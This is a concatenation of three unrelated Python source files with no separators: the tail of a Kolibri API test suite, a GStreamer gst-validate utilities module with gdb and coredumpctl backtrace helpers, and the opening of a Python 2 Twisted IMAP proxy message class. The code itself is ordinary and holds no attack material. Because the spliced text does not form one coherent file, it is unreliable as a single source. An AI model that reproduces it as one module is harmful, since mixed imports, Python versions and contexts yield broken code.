        assert_progress(c1, 0)
        assert_progress(c2, 0.4)
        assert_progress(c2c1, 0.7)

    def test_contentnode_progress_list_endpoint(self):
        facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress()

        response = self.client.get(self._reverse_channel_url("contentnodeprogress-list"))

        def get_progress_fraction(node):
            # Look up one node's progress_fraction in the list response by pk.
            return list(filter(lambda x: x['pk'] == node.pk, response.data))[0]['progress_fraction']

        # check that there is no progress when not logged in
        self.assertEqual(get_progress_fraction(root), 0)
        self.assertEqual(get_progress_fraction(c1), 0)
        self.assertEqual(get_progress_fraction(c2), 0)
        self.assertEqual(get_progress_fraction(c2c1), 0)

        # check that progress is calculated appropriately when user is logged in
        self.client.login(username="learner", password="pass", facility=facility)

        response = self.client.get(self._reverse_channel_url("contentnodeprogress-list"))

        # The progress endpoint is used, so should report progress for topics
        self.assertEqual(get_progress_fraction(root), 0.24)
        self.assertEqual(get_progress_fraction(c1), 0)
        self.assertEqual(get_progress_fraction(c2), 0.4)
        self.assertEqual(get_progress_fraction(c2c1), 0.7)

    @mock.patch.object(cache, 'set')
    def test_parent_query_cache_is_set(self, mock_cache_set):
        # A plain parent query should populate the cache.
        id = content.ContentNode.objects.get(title="c3").id
        self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id})
        self.assertTrue(mock_cache_set.called)

    @mock.patch.object(cache, 'set')
    def test_parent_query_cache_not_set(self, mock_cache_set):
        # Adding an extra filter (kind) should bypass cache population.
        id = content.ContentNode.objects.get(title="c2c3").id
        self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id, 'kind': content_kinds.EXERCISE})
        self.assertFalse(mock_cache_set.called)

    def test_parent_query_cache_hit(self):
        # Prime the cache, then verify a second identical query does not re-set it.
        id = content.ContentNode.objects.get(title="c2c3").id
        self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id})
        with mock.patch.object(cache, 'set') as mock_cache_set:
            self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id})
            self.assertFalse(mock_cache_set.called)

    def test_filtering_coach_content_anon(self):
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"by_role": True})
        # TODO make content_test.json fixture more organized. Here just, hardcoding the correct count
        self.assertEqual(len(response.data), 7)

    def test_filtering_coach_content_admin(self):
        self.client.login(username=self.admin.username, password=DUMMY_PASSWORD)
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"by_role": True})
        expected_output = content.ContentNode.objects.exclude(available=False).count()
        # coach_content node should be returned
        self.assertEqual(len(response.data), expected_output)

    def _setup_lesson(self):
        # Build a lesson that references three fixture nodes as resources.
        facility = Facility.objects.create(name="MyFac")
        admin = FacilityUser.objects.create(username="admin", facility=facility)
        admin.set_password(DUMMY_PASSWORD)
        admin.save()
        nodes = []
        nodes.append(content.ContentNode.objects.get(title='c3c1'))
        nodes.append(content.ContentNode.objects.get(title='c2c3'))
        nodes.append(content.ContentNode.objects.get(title='c2c2'))
        json_resource = [{"contentnode_id": node.id, "content_id": node.content_id, "channel_id": node.channel_id} for node in nodes]
        lesson = Lesson.objects.create(
            title="title",
            is_active=True,
            collection=facility,
            created_by=admin,
            resources=json_resource
        )
        return lesson, nodes

    def test_in_lesson_filter(self):
        lesson, nodes = self._setup_lesson()
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_lesson": lesson.id})
        self.assertEqual(len(response.data), len(lesson.resources))
        # Results should come back in lesson-resource order.
        for counter, node in enumerate(nodes):
            self.assertEqual(response.data[counter]['id'], node.id)

    def test_in_lesson_filter_invalid_value(self):
        self._setup_lesson()
        # request with invalid uuid
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_lesson": '123'})
        self.assertEqual(len(response.data), 0)
        # request with valid uuid
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_lesson": '47385a6d4df3426db38ad0d20e113dce'})
        self.assertEqual(len(response.data), 0)

    def _setup_exam(self):
        # Build an exam sourcing a single exercise node.
        facility = Facility.objects.create(name="MyFac")
        admin = FacilityUser.objects.create(username="admin", facility=facility)
        admin.set_password(DUMMY_PASSWORD)
        admin.save()
        node = content.ContentNode.objects.get(title='c3c1')
        exam = Exam.objects.create(
            title="title",
            channel_id="test",
            question_count=1,
            active=True,
            collection=facility,
            creator=admin,
            question_sources=[
                {"exercise_id": node.id, "number_of_questions": 6}
            ]
        )
        return exam, node

    def test_in_exam_filter(self):
        exam, node = self._setup_exam()
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_exam": exam.id})
        self.assertEqual(len(response.data), len(exam.question_sources))
        self.assertEqual(response.data[0]['id'], node.id)

    def test_in_exam_filter_invalid_value(self):
        self._setup_exam()
        # request with invalid uuid
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_exam": '123'})
        self.assertEqual(len(response.data), 0)
        # request with valid uuid
        response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_exam": '47385a6d4df3426db38ad0d20e113dce'})
        self.assertEqual(len(response.data), 0)

    def test_copies(self):
        # the pk is actually a content id
        response = self.client.get(reverse('contentnode-copies', kwargs={'pk': 'c6f49ea527824f398f4d5d26faf19396'}))
        expected_titles = set(['root', 'c1', 'copy'])
        response_titles = set()
        for node in response.data[0]:
            response_titles.add(node['title'])
        self.assertSetEqual(expected_titles, response_titles)

    def test_available_copies(self):
        # the pk is actually a content id
        response = self.client.get(reverse('contentnode-copies', kwargs={'pk': 'f2332710c2fd483386cdeb5dcbdda81a'}))
        # no results should be returned for unavailable content node
        self.assertEqual(len(response.data), 0)

    def test_copies_count(self):
        response = self.client.get(reverse('contentnode-copies-count'), data={'content_ids': 'f2332710c2fd483386cdeb5dcbdda81f,c6f49ea527824f398f4d5d26faf15555,f2332710c2fd483386cdeb5dcbdda81a'})
        # assert non existent content id does not show up in results
        # no results should be returned for unavailable content node
        self.assertEqual(len(response.data), 1)
        self.assertEqual(response.data[0]['count'], content.ContentNode.objects.filter(content_id='f2332710c2fd483386cdeb5dcbdda81f').count())

    def test_search(self):
        # ensure search works when there are no words not defined
        response = self.client.get(reverse('contentnode-list'), data={'search': '!?,'})
        self.assertEqual(len(response.data), 0)
        # ensure search words when there is only stopwords
        response = self.client.get(reverse('contentnode-list'), data={'search': 'or'})
        self.assertEqual(len(response.data), 0)
        # regular search
        response = self.client.get(reverse('contentnode-list'), data={'search': 'root'})
        self.assertEqual(len(response.data), 1)

    def _create_session_logs(self):
        # Seed session logs so the 'popular' filter has data: 50/25/1 views
        # across three known content ids, plus one log for an unknown id.
        content_ids = ('f2332710c2fd483386cdeb5ecbdda81f', 'ce603df7c46b424b934348995e1b05fb', '481e1bda1faa445d801ceb2afbd2f42f')
        channel_id = '6199dde695db4ee4ab392222d5af1e5c'
        [ContentSessionLog.objects.create(channel_id=channel_id, content_id=content_ids[0], start_timestamp=timezone.now(), kind='audio') for _ in range(50)]
        [ContentSessionLog.objects.create(channel_id=channel_id, content_id=content_ids[1], start_timestamp=timezone.now(), kind='exercise') for _ in range(25)]
        [ContentSessionLog.objects.create(channel_id=channel_id, content_id=content_ids[2], start_timestamp=timezone.now(), kind='document') for _ in range(1)]
        # create log for non existent content id
        # should not show up in api response
        ContentSessionLog.objects.create(channel_id=uuid.uuid4().hex, content_id=uuid.uuid4().hex, start_timestamp=timezone.now(), kind='content')
        return content_ids

    def test_popular(self):
        expected_content_ids = self._create_session_logs()
        response = self.client.get(reverse('contentnode-list'), data={'popular': uuid.uuid4().hex})
        response_content_ids = set(node['content_id'] for node in response.json())
        self.assertSetEqual(set(expected_content_ids), response_content_ids)

    def _create_summary_logs(self):
        # Seed summary logs for the 'resume' filter: one in-progress log that
        # should be returned, one completed (progress=1) and one with an
        # unknown content id that should both be excluded.
        facility = Facility.objects.create(name="MyFac")
        user = FacilityUser.objects.create(username="user", facility=facility)
        content_ids = ('f2332710c2fd483386cdeb5ecbdda81f',)
        channel_id = '6199dde695db4ee4ab392222d5af1e5c'
        ContentSummaryLog.objects.create(channel_id=channel_id, content_id=content_ids[0], user_id=user.id, start_timestamp=timezone.now(), kind='audio')
        # create log with progress of 1
        # should not show up in api response
        ContentSummaryLog.objects.create(channel_id=channel_id, content_id='ce603df7c46b424b934348995e1b05fb', user_id=user.id, progress=1, start_timestamp=timezone.now(), kind='audio')
        # create log for non existent content id
        # should not show up in api response
        ContentSummaryLog.objects.create(channel_id=uuid.uuid4().hex, content_id=uuid.uuid4().hex, user_id=user.id, start_timestamp=timezone.now(), kind='content')
        return user, content_ids

    def test_resume(self):
        user, expected_content_ids = self._create_summary_logs()
        response = self.client.get(reverse('contentnode-list'), data={'resume': user.id})
        response_content_ids = set(node['content_id'] for node in response.json())
        self.assertSetEqual(set(expected_content_ids), response_content_ids)

    def tearDown(self):
        """
        clean up files/folders created during the test
        """
        cache.clear()
        super(ContentNodeAPITestCase, self).tearDown()


def mock_patch_decorator(func):
    # Test decorator: patches requests.get to return a canned single-channel
    # JSON payload for the duration of the wrapped test.
    def wrapper(*args, **kwargs):
        mock_object = mock.Mock()
        mock_object.json.return_value = [{'id': 1, 'name': 'studio'}]
        with mock.patch.object(requests, 'get', return_value=mock_object):
            return func(*args, **kwargs)
    return wrapper


class KolibriStudioAPITestCase(APITestCase):
    # Tests for the remote-channel (Studio) endpoints; outbound HTTP is mocked
    # via mock_patch_decorator.

    def setUp(self):
        # Provision the device and log in as a superuser with device permissions.
        DeviceSettings.objects.create(is_provisioned=True)
        self.facility = Facility.objects.create(name='facility')
        superuser = FacilityUser.objects.create(username='superuser', facility=self.facility)
        superuser.set_password(DUMMY_PASSWORD)
        superuser.save()
        DevicePermissions.objects.create(user=superuser, is_superuser=True)
        self.client.login(username=superuser.username, password=DUMMY_PASSWORD)

    @mock_patch_decorator
    def test_channel_list(self):
        response = self.client.get(reverse('remotechannel-list'), format='json')
        self.assertEqual(response.data[0]['id'], 1)

    @mock_patch_decorator
    def test_no_permission_non_superuser_channel_list(self):
        # A plain facility user (no device permissions) must be rejected.
        user = FacilityUser.objects.create(username='user', facility=self.facility)
        user.set_password(DUMMY_PASSWORD)
        user.save()
        self.client.logout()
        self.client.login(username=user.username, password=DUMMY_PASSWORD)
        response = self.client.get(reverse('remotechannel-list'), format='json')
        self.assertEqual(response.status_code, 403)

    @mock_patch_decorator
    def test_channel_retrieve(self):
        response = self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json')
        self.assertEqual(response.data[0]['name'], 'studio')

    @mock_patch_decorator
    def test_channel_info_cache(self):
        # Second identical request should be served from cache (no cache.set).
        self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json')
        with mock.patch.object(cache, 'set') as mock_cache_set:
            self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json')
            self.assertFalse(mock_cache_set.called)

    @mock_patch_decorator
    def test_channel_info_404(self):
        # Upstream 404 from Studio should be propagated to the client.
        mock_object = mock.Mock()
        mock_object.status_code = 404
        requests.get.return_value = mock_object
        response = self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)

    def tearDown(self):
        cache.clear()
#!/usr/bin/env python3
#
# Copyright (c) 2013,Thibault Saunier <thibault.saunier@collabora.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301, USA.
""" Some utilities. """

try:
    import config
except ImportError:
    from . import config

import os
import platform
import re
import shutil
import shlex
import signal
import subprocess
import sys
import tempfile
import time
import urllib.request
import urllib.error
import urllib.parse

from .loggable import Loggable
from operator import itemgetter
from xml.etree import ElementTree


GST_SECOND = int(1000000000)
DEFAULT_TIMEOUT = 30
DEFAULT_MAIN_DIR = os.path.join(os.path.expanduser("~"), "gst-validate")
DEFAULT_GST_QA_ASSETS = os.path.join(
    DEFAULT_MAIN_DIR, "gst-integration-testsuites")
DISCOVERER_COMMAND = "gst-discoverer-1.0"
# Use to set the duration from which a test is considered as being 'long'
LONG_TEST = 40


class Result(object):
    """String constants naming the possible outcomes of a test."""
    NOT_RUN = "Not run"
    FAILED = "Failed"
    TIMEOUT = "Timeout"
    PASSED = "Passed"
    SKIPPED = "Skipped"
    KNOWN_ERROR = "Known error"


class Protocols(object):
    """String constants for the streaming protocols a test may exercise."""
    HTTP = "http"
    FILE = "file"
    HLS = "hls"
    DASH = "dash"
    RTSP = "rtsp"

    @staticmethod
    def needs_clock_sync(protocol):
        """Return True for adaptive protocols (HLS/DASH) that require a
        synchronized clock."""
        if protocol in [Protocols.HLS, Protocols.DASH]:
            return True
        return False


def supports_ansi_colors():
    """Return True when stdout is a tty on a platform that honours ANSI
    color escape sequences."""
    # NOTE: renamed the local so it no longer shadows the `platform` module.
    platname = sys.platform
    supported_platform = platname != 'win32' or 'ANSICON' in os.environ
    # isatty is not always implemented, #6223.
    is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()
    if not supported_platform or not is_a_tty:
        return False
    return True


class Colors(object):
    """ANSI escape codes used by printc(); emptied when colors are
    unsupported (see desactivate_colors below)."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'


def desactivate_colors():
    """Replace every color escape with the empty string (keeps the name
    used elsewhere in the testsuite, despite the spelling)."""
    Colors.HEADER = ''
    Colors.OKBLUE = ''
    Colors.OKGREEN = ''
    Colors.WARNING = ''
    Colors.FAIL = ''
    Colors.ENDC = ''


if not supports_ansi_colors():
    desactivate_colors()


def mkdir(directory):
    """Create `directory` (and parents), ignoring failures such as the
    directory already existing."""
    try:
        os.makedirs(directory)
    except os.error:
        pass


def which(name, extra_path=None):
    """Locate executable `name` on PATH (optionally prefixed by
    `extra_path`), honouring PATHEXT on Windows.

    Returns the full path, or None when not found.
    """
    exts = [_f for _f in os.environ.get('PATHEXT', '').split(os.pathsep) if _f]
    path = os.environ.get('PATH', '')
    if extra_path:
        path = extra_path + os.pathsep + path
    if not path:
        # FIX: previously returned [] here, inconsistent with the None
        # returned on the not-found path below.
        return None
    for p in path.split(os.pathsep):
        p = os.path.join(p, name)
        if os.access(p, os.X_OK):
            return p
        for e in exts:
            pext = p + e
            if os.access(pext, os.X_OK):
                return pext
    return None


def get_color_for_result(result):
    """Map a Result constant to the ANSI color used to display it."""
    if result is Result.FAILED:
        color = Colors.FAIL
    elif result is Result.TIMEOUT:
        color = Colors.WARNING
    elif result is Result.PASSED:
        color = Colors.OKGREEN
    else:
        color = Colors.OKBLUE
    return color


def printc(message, color="", title=False, title_char=''):
    """Print `message` to stdout in `color`.

    With title=True the message is framed with '=' lines; with a
    title_char it is underlined with that character. If `message` has a
    `.result` attribute and no color was given, the color is derived
    from that result.
    """
    if title or title_char:
        length = 0
        for l in message.split("\n"):
            if len(l) > length:
                length = len(l)
        if length == 0:
            length = len(message)
        if title is True:
            message = length * "=" + "\n" + str(message) + "\n" + length * '='
        else:
            message = str(message) + "\n" + length * title_char
    if hasattr(message, "result") and color == '':
        color = get_color_for_result(message.result)
    sys.stdout.write(color + str(message) + Colors.ENDC + "\n")
    sys.stdout.flush()


def launch_command(command, color=None, fails=False):
    """Echo then run `command` through the shell; raise
    CalledProcessError on a non-zero exit status when fails=True."""
    printc(command, Colors.OKGREEN, True)
    res = os.system(command)
    if res != 0 and fails is True:
        raise subprocess.CalledProcessError(res, "%s failed" % command)


def path2url(path):
    """Convert a filesystem path to a file:// URI."""
    return urllib.parse.urljoin('file:', urllib.request.pathname2url(path))


def is_windows():
    """Return True on native Windows or a mingw environment."""
    platname = platform.system().lower()
    return platname == 'windows' or 'mingw' in platname


def url2path(url):
    """Convert a file:// URI back to a local, unquoted filesystem path."""
    path = urllib.parse.urlparse(url).path
    if "win32" in sys.platform:
        if path[0] == '/':
            return path[1:]  # We need to remove the first '/' on windows
    path = urllib.parse.unquote(path)
    return path


def isuri(string):
    """Return True when `string` parses as a URI with a scheme."""
    url = urllib.parse.urlparse(string)
    # FIX: the scheme check was duplicated ("!= '' and != ''"); a single
    # test is sufficient.
    if url.scheme != "":
        return True
    return False


def touch(fname, times=None):
    """Create `fname` if needed and update its access/modification times."""
    with open(fname, 'a'):
        os.utime(fname, times)


def get_subclasses(klass, env):
    """Return all values in mapping `env` that are strict subclasses of
    `klass` (non-type entries are skipped)."""
    subclasses = []
    for symb in env.items():
        try:
            if issubclass(symb[1], klass) and symb[1] is not klass:
                subclasses.append(symb[1])
        except TypeError:
            pass
    return subclasses


def TIME_ARGS(time):
    """Format a GstClockTime (nanoseconds) as H:MM:SS.NNNNNNNNN.

    NOTE(review): the parameter deliberately keeps its historical name
    even though it shadows the `time` module inside this function.
    """
    return "%u:%02u:%02u.%09u" % (time / (GST_SECOND * 60 * 60),
                                  (time / (GST_SECOND * 60)) % 60,
                                  (time / GST_SECOND) % 60,
                                  time % GST_SECOND)


def look_for_file_in_source_dir(subdir, name):
    """Return the path of @name under @subdir of the source tree, or None
    when it does not exist."""
    root_dir = os.path.abspath(os.path.dirname(
        os.path.join(os.path.dirname(os.path.abspath(__file__)))))
    p = os.path.join(root_dir, subdir, name)
    if os.path.exists(p):
        return p
    return None


# Returns the path $top_src_dir/@subdir/@name if running from source, or
# $DATADIR/gstreamer-1.0/validate/@name if not
def get_data_file(subdir, name):
    # Are we running from sources?
    p = look_for_file_in_source_dir(subdir, name)
    if p:
        return p

    # Look in system data dirs
    p = os.path.join(config.DATADIR, 'gstreamer-1.0', 'validate', name)
    if os.path.exists(p):
        return p

    return None


#
# Some utilities to parse gst-validate output   #
#


def gsttime_from_tuple(stime):
    """Convert an (hours, minutes, seconds, nanoseconds) tuple of strings
    to a GstClockTime in nanoseconds."""
    return int((int(stime[0]) * 3600 + int(stime[1]) * 60 + int(stime[2])) * GST_SECOND + int(stime[3]))


timeregex = re.compile(r'(?P<_0>.+):(?P<_1>.+):(?P<_2>.+)\.(?P<_3>.+)')


def parse_gsttimeargs(time):
    """Parse a "H:MM:SS.NNNNNNNNN" string into nanoseconds."""
    stime = list(map(itemgetter(1), sorted(
        timeregex.match(time).groupdict().items())))
    return int((int(stime[0]) * 3600 + int(stime[1]) * 60 + int(stime[2])) * GST_SECOND + int(stime[3]))


def get_duration(media_file):
    """Return the duration of `media_file` in nanoseconds as reported by
    gst-discoverer-1.0, or 0 when it cannot be determined."""

    duration = 0
    res = ''
    try:
        res = subprocess.check_output(
            [DISCOVERER_COMMAND, media_file]).decode()
    except subprocess.CalledProcessError:
        # gst-media-check returns !0 if seeking is not possible, we do not care
        # in that case.
        pass

    for l in res.split('\n'):
        if "Duration: " in l:
            duration = parse_gsttimeargs(l.replace("Duration: ", ""))
            break

    return duration


def get_scenarios():
    """Ask gst-validate to dump its scenario definitions to a file in the
    temporary directory and return that file's path."""
    GST_VALIDATE_COMMAND = "gst-validate-1.0"
    # FIX: the format string expected two arguments but only one was
    # supplied, raising TypeError on every call.
    outfile = os.path.join(tempfile.gettempdir(), "scenarios.defs")
    os.system("%s --scenarios-defs-output-file %s" % (GST_VALIDATE_COMMAND,
                                                      outfile))
    return outfile


class BackTraceGenerator(Loggable):
    """Singleton helper producing backtraces for test processes, either by
    attaching gdb to a live process or by extracting a core dump through
    systemd's coredumpctl (optionally via flatpak-spawn)."""
    __instance = None
    _command_line_regex = re.compile(r'Command Line: (.*)\n')
    _timestamp_regex = re.compile(r'Timestamp: .*\((\d*)s ago\)')
    _pid_regex = re.compile(r'PID: (\d+) \(.*\)')

    def __init__(self):
        Loggable.__init__(self)

        # Flatpak sandboxes expose the host's coredumpctl via flatpak-spawn.
        self.in_flatpak = os.path.exists("/usr/manifest.json")
        if self.in_flatpak:
            coredumpctl = ['flatpak-spawn', '--host', 'coredumpctl']
        else:
            coredumpctl = ['coredumpctl']

        try:
            subprocess.check_output(coredumpctl)
            self.coredumpctl = coredumpctl
        except Exception as e:
            self.warning(e)
            self.coredumpctl = None
        self.gdb = shutil.which('gdb')

    @classmethod
    def get_default(cls):
        """Return the shared BackTraceGenerator instance."""
        if not cls.__instance:
            cls.__instance = BackTraceGenerator()

        return cls.__instance

    def get_trace(self, test):
        """Return a backtrace for `test`: live-attach when its process has
        not exited, otherwise look for a core dump."""
        if not test.process.returncode:
            return self.get_trace_on_running_process(test)

        if self.coredumpctl:
            return self.get_trace_from_systemd(test)

        self.debug("coredumpctl not present, and it is the only"
                   " supported way to get backtraces for now.")
        return None

    def get_trace_on_running_process(self, test):
        """Attach gdb to the still-running test process and capture a
        'thread apply all bt' dump (30s timeout)."""
        if not self.gdb:
            # FIX: the split string literal was missing a space and printed
            # "is notinstalled.".
            return "Can not generate stack trace as `gdb` is not" \
                " installed."

        gdb = ['gdb', '-ex', 't a a bt', '-batch',
               '-p', str(test.process.pid)]

        try:
            return subprocess.check_output(
                gdb, stderr=subprocess.STDOUT, timeout=30).decode()
        except Exception as e:
            return "Could not run `gdb` on process (pid: %d):\n%s" % (
                test.process.pid, e)

    def get_trace_from_systemd(self, test):
        """Poll coredumpctl (up to 10 tries) for a core matching the test
        process, then run gdb on the extracted dump. Returns the combined
        coredumpctl info + backtrace text, or None."""
        for ntry in range(10):
            if ntry != 0:
                # Looping, it means we consider the logs might not be ready
                # yet.
                time.sleep(1)

            if not self.in_flatpak:
                coredumpctl = self.coredumpctl + ['info', str(test.process.pid)]
            else:
                # We can't ask the PID to the flatpak-spawned coredumpctl,
                # so match on executable name and start time instead.
                newer_than = time.strftime("%a %Y-%m-%d %H:%M:%S %Z",
                                           time.localtime(test._starting_time))
                coredumpctl = self.coredumpctl + ['info', os.path.basename(test.command[0]),
                                                  '--since', newer_than]

            try:
                info = subprocess.check_output(coredumpctl, stderr=subprocess.STDOUT)
            except subprocess.CalledProcessError:
                # The trace might not be ready yet
                time.sleep(1)
                continue

            info = info.decode()
            try:
                pid = self._pid_regex.findall(info)[0]
            except IndexError:
                self.debug("Backtrace could not be found yet, trying harder.")
                continue

            command_line = BackTraceGenerator._command_line_regex.findall(info)[0]
            if shlex.split(command_line)[0] != test.application:
                self.debug("PID: %s -- executable %s != test application: %s" % (
                    pid, command_line[0], test.application))
                # The trace might not be ready yet
                continue

            if not BackTraceGenerator._timestamp_regex.findall(info):
                self.debug("Timestamp %s is more than 1min old",
                           re.findall(r'Timestamp: .*', info))
                # The trace might not be ready yet
                continue

            bt_all = None
            if self.gdb:
                try:
                    with tempfile.NamedTemporaryFile() as stderr:
                        coredump = subprocess.check_output(self.coredumpctl + ['dump', pid],
                                                           stderr=stderr)

                    with tempfile.NamedTemporaryFile() as tf:
                        tf.write(coredump)
                        tf.flush()
                        gdb = ['gdb', '-ex', 't a a bt', '-ex', 'quit',
                               test.application, tf.name]
                        bt_all = subprocess.check_output(
                            gdb, stderr=subprocess.STDOUT).decode()

                        info += "\nThread apply all bt:\n\n%s" % (
                            bt_all.replace('\n', '\n' + 15 * ' '))
                except Exception as e:
                    self.error("Could not get backtrace from gdb: %s" % e)

            return info

        return None


def check_bugs_resolution(bugs_definitions):
    """Query bugzilla for each (regex, bug-url) definition and report the
    bug statuses. Returns False when any referenced bug is already closed
    (i.e. no longer 'new'/'verified'), True otherwise."""
    bugz = {}
    regexes = {}
    for regex, bugs in bugs_definitions:
        if isinstance(bugs, str):
            bugs = [bugs]

        for bug in bugs:
            url = urllib.parse.urlparse(bug)

            if "bugzilla" not in url.netloc:
                printc(" + %s \n  --> bug: %s\n  --> Status: Not a bugzilla report\n" % (regex, bug),
                       Colors.WARNING)
                continue

            query = urllib.parse.parse_qs(url.query)
            _id = query.get('id')
            if not _id:
                printc(" + '%s' -- Can't check bug '%s'\n" % (regex, bug),
                       Colors.WARNING)
                continue

            if isinstance(_id, list):
                _id = _id[0]

            regexes[_id] = (regex, bug)
            url_parts = tuple(list(url)[:3] + ['', '', ''])
            ids = bugz.get(url_parts, [])
            ids.append(_id)
            bugz[url_parts] = ids

    res = True
    for url_parts, ids in bugz.items():
        url_parts = list(url_parts)
        query = {'id': ','.join(ids)}
        query['ctype'] = 'xml'
        url_parts[4] = urllib.parse.urlencode(query)
        try:
            # FIX: the urlopen result used to be assigned to `res`,
            # clobbering the boolean return value of this function.
            reply = urllib.request.urlopen(urllib.parse.urlunparse(url_parts))
        except Exception as e:
            printc(" + Could not properly check bugs status for: %s (%s)\n"
                   % (urllib.parse.urlunparse(url_parts), e), Colors.FAIL)
            continue

        root = ElementTree.fromstring(reply.read())
        bugs = root.findall('./bug')

        if len(bugs) != len(ids):
            printc(" + Could not properly check bugs status on server %s\n" %
                   urllib.parse.urlunparse(url_parts), Colors.FAIL)
            continue

        for bugelem in bugs:
            status = bugelem.findtext('./bug_status')
            bugid = bugelem.findtext('./bug_id')
            regex, bug = regexes[bugid]
            desc = bugelem.findtext('./short_desc')

            if not status:
                printc(" + %s \n  --> bug: %s\n  --> Status: UNKNOWN\n" % (regex, bug),
                       Colors.WARNING)
                continue

            if not status.lower() in ['new', 'verified']:
                printc(" + %s \n  --> bug: #%s: '%s'\n  ==> Bug CLOSED already (status: %s)\n" % (
                    regex, bugid, desc, status), Colors.WARNING)

                res = False

            printc(" + %s \n  --> bug: #%s: '%s'\n  --> Status: %s\n" % (
                regex, bugid, desc, status), Colors.OKGREEN)

    return res


def kill_subprocess(owner, process, timeout):
    """Forcefully terminate `process` (taskkill on Windows, SIGKILL
    elsewhere), retrying with exponential backoff until it exits or
    `timeout` seconds have elapsed. Returns the process return code."""
    if process is None:
        return

    stime = time.time()
    res = process.poll()
    waittime = 0.05
    while res is None:
        try:
            owner.debug("Subprocess is still alive, sending KILL signal")
            if is_windows():
                subprocess.call(
                    ['taskkill', '/F', '/T', '/PID', str(process.pid)])
            else:
                process.send_signal(signal.SIGKILL)
            time.sleep(waittime)
            waittime *= 2
        except OSError:
            pass
        # FIX: the `timeout` parameter was previously ignored in favour of
        # the module-level DEFAULT_TIMEOUT.
        if time.time() - stime > timeout:
            raise RuntimeError("Could not kill subprocess after %s second"
                               " Something is really wrong, => EXITING" % timeout)
        res = process.poll()

    return res
#|##############################################################################
#|Copyright (c) 2009, The Green-Span Project. All rights reserved. This code is
#|Open Source Free Software - redistribution and use in source and binary forms,
#|with or without modification, are permitted under the Two Clause BSD License.
#|##############################################################################
#|File Created: 2009-04-03
#|Author(s): Sean Hastings,
#|##############################################################################

# NOTE(review): Python 2-only module (print statements, dict.has_key,
# cStringIO, zope.interface.implements) — will not run under Python 3.

VERBOSE = True

from globals import ALLVERBOSE
from cStringIO import StringIO
from twisted.mail import imap4
from zope.interface import implements


class ImapProxyMessage(object):
    """Wraps one raw message fetched from an upstream IMAP server so that
    twisted.mail's IMAP4 server machinery can serve it (imap4.IMessage)."""
    implements(imap4.IMessage)

    def __init__(self,minfo,mailbox):
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage.__init__"
            print minfo
        #initialize instance variables
        self.mailbox = mailbox
        #update/initialize others from messageinfo
        self.update(minfo)

    def update(self,minfo):
        """Update message state from a dictionary of fetched message parts.

        @type minfo: C{dict}
        @param minfo: Mapping with at least the keys:
            - 'UID': message UID as a string, e.g. '1'
            - 'FLAGS': list of IMAP flags, e.g. ['\\Seen', '\\Draft']
            - 'RFC822': the full raw message text, CRLF-delimited headers
              followed by a blank line and the body
        Sets self.uid, self.flags, self.raw_headers, self.body and the
        parsed self.headers. Returns nothing.
        """
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage.update"
            print minfo
        self.uid = int(minfo['UID'])
        self.flags = minfo['FLAGS']
        #split headers and body
        end_headers = minfo['RFC822'].find('\r\n\r\n') #first blank line indicates start of body
        self.raw_headers = minfo['RFC822'][:end_headers]
        # +4 skips the '\r\n\r\n' separator itself
        self.body = minfo['RFC822'][(end_headers+4):]
        self.headers = self._parseHeaders(self.raw_headers)

    def _parseHeaders(self,raw_headers):
        """Parse a CRLF-separated raw header block into a dictionary.

        @type raw_headers: C{str}
        @param raw_headers: Raw header text, one 'Name: value' field per
            CRLF-delimited line; continuation lines start with a space or
            tab per RFC 822 folding.
        @rtype: C(dict)
        @return: Dictionary mapping header names (cast to upper case) to
            values, with folded (multi-line) values preserved.
        """
        #Add standin for multiline headers (CrLf followed by space or tab)
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage['%s']._parseheaders" % self.uid
            print raw_headers
        raw_headers = raw_headers.replace('\r\n ','[MLSPC]').replace('\r\n\t','[MLTAB]')
        headers = {}
        lines = raw_headers.split('\r\n')
        for line in lines:
            key_end = line.find(':')
            key = line[:key_end].upper()
            value = line[key_end+1:].lstrip()
            #put multi-line header Cr+Lf+(SPACE or TAB) back in
            headers[key] = value.replace('[MLSPC]','\r\n ').replace('[MLTAB]','\r\n\t')
        if ALLVERBOSE or VERBOSE:
            print headers
        return headers

    def getHeaders(self, negate, *names):
        """Retrieve a group of message headers.

        @type names: C{tuple} of C{str}
        @param names: The names of the headers to retrieve or omit.
            NOTE: parsed header keys are upper-cased, so lookups here only
            match upper-case names.
        @type negate: C{bool}
        @param negate: If True, indicates that the headers listed in C{names}
        should be omitted from the return value, rather
        than included.

        @rtype: C{dict}
        @return: A mapping of header field names to header field values
        """
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage['%s'].getHeaders" % self.uid
            print "negate = %s " % negate
            print names
